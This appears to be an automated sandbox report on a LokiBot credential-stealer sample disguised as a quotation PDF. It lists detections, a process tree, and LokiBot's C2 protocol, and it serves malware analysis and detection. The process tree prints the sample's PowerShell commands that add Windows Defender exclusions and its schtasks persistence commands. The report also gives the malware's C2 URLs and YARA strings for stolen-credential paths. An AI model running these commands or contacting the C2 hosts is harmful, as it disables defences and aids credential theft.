Edit tour

Windows Analysis Report
Quotation_Order_Request_pdf.bat.exe

Overview

General Information

Sample name:	Quotation_Order_Request_pdf.bat.exe
Analysis ID:	1628799
MD5:	09b6049650f69c6a286cc49844515eb9
SHA1:	c3d3aefe7dd2449718a200c819209ee2454f9654
SHA256:	9fddf8ffb5fb825b9f02c231796769540b01e34871b0bd2c067ae735e7120652
Tags:	exeLokiuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Quotation_Order_Request_pdf.bat.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe" MD5: 09B6049650F69C6A286CC49844515EB9)

powershell.exe (PID: 3220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1136 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7216 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

bCirqu.exe (PID: 7256 cmdline: C:\Users\user\AppData\Roaming\bCirqu.exe MD5: 09B6049650F69C6A286CC49844515EB9)

schtasks.exe (PID: 7484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 1540 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x478b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fcf:$des3: 68 03 66 00 00 0x173c0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1748c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17c10:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4fdb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1381f:$des3: 68 03 66 00 00 0x17c10:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17cdc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17c30:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ffb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1383f:$des3: 68 03 66 00 00 0x17c30:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17cfc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173e0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fef:$des3: 68 03 66 00 00 0x173e0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x29735:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x73604:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1e6a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: bCirqu.exe PID: 7256	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: bCirqu.exe PID: 7256	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: bCirqu.exe PID: 7256	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: bCirqu.exe PID: 7256	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x23e9d:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x60ddb:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

